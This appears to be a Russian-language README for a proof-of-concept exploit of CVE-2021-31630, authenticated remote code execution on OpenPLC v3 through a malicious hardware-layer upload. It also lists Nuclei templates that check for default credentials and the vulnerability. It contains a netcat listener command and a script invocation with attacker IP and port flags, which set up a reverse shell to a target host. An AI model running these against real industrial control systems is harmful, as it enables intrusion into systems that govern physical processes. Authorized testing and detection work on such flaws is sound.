
Концептуальный эксплойт для Python 3.13+ для CVE-2021-31630, обеспечивающий аутентифицированное удаленное выполнение кода на OpenPLC v3 через вредоносную загрузку аппаратного уровня. Включает шаблоны обнаружения Nuclei для проверки учетных данных по умолчанию и уязвимостей.
Это современный эксплойт Proof-of-Concept, совместимый с Python 3.13+, для CVE-2021-31630 — уязвимости в OpenPLC v3, которая позволяет аутентифицированному пользователю загрузить собственный аппаратный слой, содержащий вредоносный код, что приводит к удаленному выполнению кода (RCE) на хосте.
Первоначальное обнаружение уязвимости и уведомление — Fellipe Oliveira. Эта повторная реализация и модернизация использует httpx, инструменты командной строки, журналирование и более безопасные методы обнаружения.
nc -lvnp 9001
python3 openplc_rce.py http://target:8080 -lh YOUR_IP -lp 9001
Опциональные флаги:
nuclei -t nuclei-templates/openplc-default-login.yaml -u http://target:8080
nuclei -t nuclei-templates/openplc-authenticated-rce-check.yaml -u http://target:8080
Второй шаблон выполняет вход и пытается загрузить безвредную полезную нагрузку + компиляцию, чтобы подтвердить вероятную уязвимость — без запуска фактического выполнения кода.
Этот код предназначен только для образовательного и авторизованного тестирования безопасности. Не используйте без явного разрешения владельца системы.